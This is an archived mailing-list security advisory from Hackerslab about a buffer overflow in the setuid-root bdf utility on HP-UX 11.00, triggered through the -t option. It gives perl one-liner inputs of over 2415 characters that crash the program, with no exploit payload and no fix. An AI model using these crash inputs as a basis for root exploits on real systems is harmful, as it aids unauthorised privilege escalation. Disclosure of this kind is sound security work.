dubheHACKERSLAB.COM

• Next message: Ian Jackson: "userv security boundary tool 1.0.1 (SECURITY FIX)"
• Previous message: Aaron Turner: "Re: CheckPoint FW-1 4.1 SP 2 Released"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

================================================================================

             [ Hackerslab bug_paper ] HP-UX bdf -t option buffer overflow vul

================================================================================



File : /usr/bin/bdf


SYSTEM : HP-UX 11.00

           Tested by HP-UX B.11.00

INFO :

           bdf - report number of free disk blocks (Berkeley version)

           -t type Report on the file systems of a given type (for
                          example, nfs or hfs).


* 'bdf' program has SUID permission.

$ ls -la `which bdf`
-r-sr-xr-x 1 root bin 24576 Apr 7 1998 /usr/bin/bdf

* Using '-t' option with long character

$ bdf -t `perl -e 'print "A"x2415'`
bdf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA..omited...AAAAAAAAAAAAAAAA : No such file or directory
usage: bdf [ -b ] [ -i ] [ -l ] [-t type | file... ]
$ bdf -t `perl -e 'print "A"x2416'`
Memory fault
$

<bash environment>
bash-2.04$ bdf -b -t `perl -e 'print "A"x2416'`
Segmentation fault
bash-2.04$

***

If bigger than 2415 characters, 'bdf' has Segment faulted.
Maybe.. 'bdf' has not checked string boundary.

SOLUTION

Don't know :)


==-------------------------------------------------------------------------------==
       *********
   * ** ** *
 * ** ** *
* ******* *
 * ** ** * dubhehackerslab.org
   * ** ** * [ http://www.hackerslab.org ]
       ********* HACKERSLAB (C) since 2000
==-------------------------------------------------------------------------------==

• Next message: Ian Jackson: "userv security boundary tool 1.0.1 (SECURITY FIX)"
• Previous message: Aaron Turner: "Re: CheckPoint FW-1 4.1 SP 2 Released"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]